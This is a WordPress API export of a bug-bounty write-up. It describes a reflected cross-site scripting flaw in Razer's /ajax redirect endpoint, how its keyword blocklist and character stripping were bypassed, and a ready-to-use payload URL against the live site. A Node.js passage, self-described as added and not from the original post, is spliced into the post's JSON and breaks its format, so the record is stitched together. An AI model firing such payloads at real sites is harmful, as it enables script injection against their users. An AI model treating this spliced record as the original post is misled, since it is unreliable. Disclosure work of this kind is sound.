{"id":221,"date":"2024-01-24T19:06:00","date_gmt":"2024-01-24T12:06:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=221"},"modified":"2025-10-14T22:53:24","modified_gmt":"2025-10-14T15:53:24","slug":"bypassing-razers-waf-for-xss","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/bypassing-razers-waf-for-xss\/","title":{"rendered":"Bypassing Razer&#8217;s WAF for XSS"},"content":{"rendered":"\n<p>While testing Razer\u2019s web application, I identified an <strong>XSS vulnerability<\/strong> in their <code>\/ajax<\/code> endpoint. The issue arises due to insufficient validation of the <code>URL<\/code> parameter, allowing JavaScript execution despite filtering attempts. This write-up outlines how I discovered the parameter using Arjun, crafted a bypass for their filters and successfully executed a proof of concept (PoC).<\/p>\n\n\n\n<p>To begin, I used <strong>Arjun<\/strong>, a tool designed to identify query parameters that web applications accept and process. Running the following command revealed the presence of the <code>URL<\/code> parameter:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">arjun -u https:\/\/www2.razer.com\/ajax<\/code><\/pre>\n\n\n\n<p>Arjun reported that the <code>URL<\/code> parameter was being processed by the server. 
Further testing revealed that its value was reflected in the response.<\/p>\n\n\n\n<p>When passing a value to the <code>URL<\/code> parameter, the application rendered the following HTML response:<\/p>\n\n\n\n<p><strong>Request:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/google.com<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">&lt;html&gt;\n&lt;head&gt;\n&lt;meta http-equiv='Content-Type' content='text\/html; charset=utf-8'\/&gt;\n&lt;title&gt;Redirect&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;p&gt;To proceed to the URL you have requested, click the link below:&lt;\/p&gt;\n&lt;p&gt;&lt;a href='https:\/\/google.com'&gt;https:\/\/google.com&lt;\/a&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<p>The parameter value lands unchanged inside the <code>href<\/code> of a link on an interstitial redirect page. This indicated that the server neither restricted the URL scheme nor sanitized the input, so I tested other schemes, including <code>javascript:\/\/<\/code>, which was reflected just the same and yields a link that executes JavaScript when clicked. 
However, initial attempts at executing JavaScript code ran into several backend restrictions.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Understanding the Filter Mechanism<\/h3>\n\n\n\n<p>The backend implemented some basic filtering:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Blocked words<\/strong>: a <code>URL<\/code> value containing <code>window<\/code>, <code>alert<\/code>, <code>eval<\/code> or <code>error<\/code> was rejected outright.<\/li>\n\n\n\n<li><strong>Removed characters<\/strong>: the characters <code>{<\/code>, <code>}<\/code>, <code>(<\/code>, <code>)<\/code> and <code>`<\/code> were stripped from the value before it was reflected.<\/li>\n<\/ul>\n\n\n\n<p>Testing an otherwise valid URL containing <code>alert<\/code>, for example, returned a <code>500 Internal Server Error<\/code>:<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Request:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/alert.com<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Response:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-1024x510.png\" alt=\"500 Internal Server Error returned for URL=https:\/\/alert.com\" class=\"wp-image-222\" style=\"width:402px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-1024x510.png 1024w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-300x149.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-768x382.png 768w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1.png 1366w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Bypassing the Filter<\/h3>\n\n\n\n<p>To get past the blocklist, I found that placing <code>{<\/code> and <code>}<\/code> <em>inside<\/em> a blocked word was enough. The keyword check evidently ran on the raw value, and the character stripping ran afterwards on whatever had passed: <code>a{ler}t<\/code> contains no blocked word, so it was accepted, and the strip step then removed the braces and reassembled <code>alert<\/code> in the reflected output.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Request:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/a{ler}t.com<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Response:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"581\" height=\"193\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1.png\" alt=\"Response returned for URL=https:\/\/a{ler}t.com\" class=\"wp-image-224\" style=\"width:489px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1.png 581w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1-300x100.png 300w\" sizes=\"auto, (max-width: 581px) 100vw, 581px\" \/><\/figure>\n\n\n\n<p>This confirmed that the two filter steps were applied in the wrong order: the stripping step rebuilt exactly the keyword the blocklist was meant to catch, and nothing re-checked its output. With this insight, I proceeded to craft a more advanced payload.<\/p>\n\n\n\n<p>The same trick covers every blocked word, so I split each one with braces (<code>a{ler}t<\/code>, <code>on{err}o}r<\/code>) and wrote the JavaScript so that it needs none of the stripped characters. 
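<\/p>\n\n\n\n<p>The following is an added example, not code from the original post and not Razer's actual backend. It is a Node.js model of the filter as a keyword blocklist checked on the once-decoded value, followed by a strip of <code>{<\/code>, <code>}<\/code>, <code>(<\/code>, <code>)<\/code> and <code>`<\/code> from whatever passed, which is the ordering that reproduces the <code>a{ler}t<\/code> behaviour. It runs the write-up's own inputs through that model, through a hardened version that strips first and then allow-lists the <code>http<\/code> and <code>https<\/code> schemes with the WHATWG URL parser, and through a small function showing what a browser evaluates when the reflected <code>javascript:<\/code> link is clicked. The blocklist contents, the strip set, the status codes and the function names are assumptions.<\/p>

```javascript
// Added example: a model of the filter ordering inferred in the write-up, not the
// original post's code and not Razer's real backend. Blocklist, strip set, status
// codes and function names are assumptions chosen to match the observed behaviour.

const BLOCKED_WORDS = ['window', 'alert', 'eval', 'error'];
const STRIPPED_CHARS = /[{}()`]/g;

// Vulnerable ordering: decode the parameter once, run the keyword blocklist on the
// result, and only THEN strip braces/parentheses/backticks. The strip step can
// reassemble a blocked word, and nothing re-checks its output.
function vulnerableFilter(rawParam) {
  const decoded = decodeURIComponent(rawParam);
  const lower = decoded.toLowerCase();
  if (BLOCKED_WORDS.some((w) => lower.includes(w))) {
    return { status: 500, href: null };   // the 500 observed for https://alert.com
  }
  return { status: 200, href: decoded.replace(STRIPPED_CHARS, '') };
}

// Hardened ordering: normalise first (decode, strip), then parse with the WHATWG
// URL parser and allow-list the scheme. The scheme check, not a keyword list, is
// what stops javascript: links; alert.com is a perfectly legitimate hostname.
function hardenedFilter(rawParam) {
  try {
    const cleaned = decodeURIComponent(rawParam).replace(STRIPPED_CHARS, '');
    const parsed = new URL(cleaned);     // throws on unparsable input
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
      return { status: 400, href: null };
    }
    return { status: 200, href: parsed.href };
  } catch (e) {
    return { status: 400, href: null };  // malformed percent-encoding or URL
  }
}

// What a browser evaluates on click: the text after 'javascript:' is
// percent-decoded, so the once-decoded %0a becomes a real newline that ends the
// line comment opened by the two slashes. Returns the non-comment lines, i.e.
// the statements that would actually run.
function javascriptUrlStatements(href) {
  if (!href.toLowerCase().startsWith('javascript:')) return [];
  const body = decodeURIComponent(href.slice('javascript:'.length));
  const newline = String.fromCharCode(10);
  return body.split(newline).filter((line) => !line.trim().startsWith('//'));
}

// Constructed inputs taken from the write-up's requests.
const BENIGN = 'https://google.com';
const DIRECT = 'https://alert.com';
const SPLIT = 'https://a{ler}t.com';
const PAYLOAD = 'javascript://%250athrow%20on{err}o}r=a{ler}t,1337';

for (const p of [BENIGN, DIRECT, SPLIT, PAYLOAD]) {
  const v = vulnerableFilter(p);
  const h = hardenedFilter(p);
  console.log(p);
  console.log('  vulnerable:', v.status, v.href);
  console.log('  hardened:  ', h.status, h.href);
}
console.log('browser would run:', javascriptUrlStatements(vulnerableFilter(PAYLOAD).href));
```

<p>Run it with <code>node<\/code>. The vulnerable model returns 500 for <code>https:\/\/alert.com<\/code>, passes <code>https:\/\/a{ler}t.com<\/code> and reflects it as <code>https:\/\/alert.com<\/code>, and reflects the final payload with the braces removed and <code>%250a<\/code> reduced to <code>%0a<\/code>; the browser-side view of that <code>href<\/code> is the single statement <code>throw onerror=alert,1337<\/code>. The hardened model rejects the payload with 400 while still accepting <code>alert.com<\/code>, because the scheme allow-list, not the keyword list, is the control that matters for a redirect endpoint.<\/p>\n\n\n\n<p>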
The result is the payload below.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Final Payload:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">javascript:\/\/%250athrow%20on{err}o}r=a{ler}t,1337<\/code><\/pre>\n\n\n\n<p>This payload uses:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong><code>javascript:\/\/<\/code> scheme<\/strong>: when the link is clicked, the browser executes the rest of the URL as JavaScript. The two slashes open a line comment, so everything up to the next newline is ignored.<\/li>\n\n\n\n<li><strong>Double-encoded newline<\/strong>: the server URL-decodes the parameter once, turning <code>%250a<\/code> into <code>%0a<\/code> in the reflected <code>href<\/code>. The browser decodes it again when it evaluates the <code>javascript:<\/code> URL, producing a real newline that terminates the <code>\/\/<\/code> comment so the code after it runs.<\/li>\n\n\n\n<li><strong>Split keywords<\/strong>: <code>on{err}o}r<\/code> and <code>a{ler}t<\/code> contain no blocked word when the blocklist runs, and become <code>onerror<\/code> and <code>alert<\/code> once the braces are stripped.<\/li>\n\n\n\n<li><strong>Call-free trigger<\/strong>: <code>throw onerror=alert,1337<\/code> needs no parentheses or backticks, which the filter removes. The comma expression first assigns <code>alert<\/code> to the global <code>onerror<\/code> handler and then throws <code>1337<\/code>; the uncaught exception invokes the handler, which calls <code>alert<\/code> with the error message containing <code>1337<\/code>. This is the parentheses-free technique from the PortSwigger research listed under Reference.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Steps to Reproduce<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open the vulnerable URL with the crafted payload:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=javascript:\/\/%250athrow%20on{err}o}r=a{ler}t,1337<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The server responds with the following HTML; note that the braces are gone and <code>%250a<\/code> has become <code>%0a<\/code>:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">&lt;html&gt;\n&lt;head&gt;\n&lt;meta http-equiv='Content-Type' content='text\/html; charset=utf-8'\/&gt;\n&lt;title&gt;Redirect&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;p&gt;To proceed to the URL you have requested, click the link below:&lt;\/p&gt;\n&lt;p&gt;&lt;a href='javascript:\/\/%0athrow%20onerror=alert,1337'&gt;javascript:\/\/%0athrow onerror=alert,1337&lt;\/a&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Click the displayed payload link on the rendered page.<\/li>\n\n\n\n<li>The XSS payload is executed, triggering an alert box.<\/li>\n<\/ul>\n\n\n\n<h4 
class=\"wp-block-heading\">Screenshot:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"504\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-1024x504.png\" alt=\"\" class=\"wp-image-223\" style=\"width:469px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-1024x504.png 1024w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-300x148.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-768x378.png 768w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1.png 1366w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Reference:<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/portswigger.net\/research\/xss-without-parentheses-and-semi-colons\">https:\/\/portswigger.net\/research\/xss-without-parentheses-and-semi-colons<\/a><\/li>\n<\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>While testing Razer\u2019s web application, I identified an XSS vulnerability in their \/ajax endpoint. The issue arises due to insufficient validation of the URL parameter, allowing JavaScript execution despite filtering attempts. This write-up outlines how I discovered the parameter using Arjun, crafted a bypass for their filters and successfully executed a proof of concept (PoC). 
[&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":320,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-221","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=221"}],"version-history":[{"count":8,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221\/revisions\/319"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/320"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}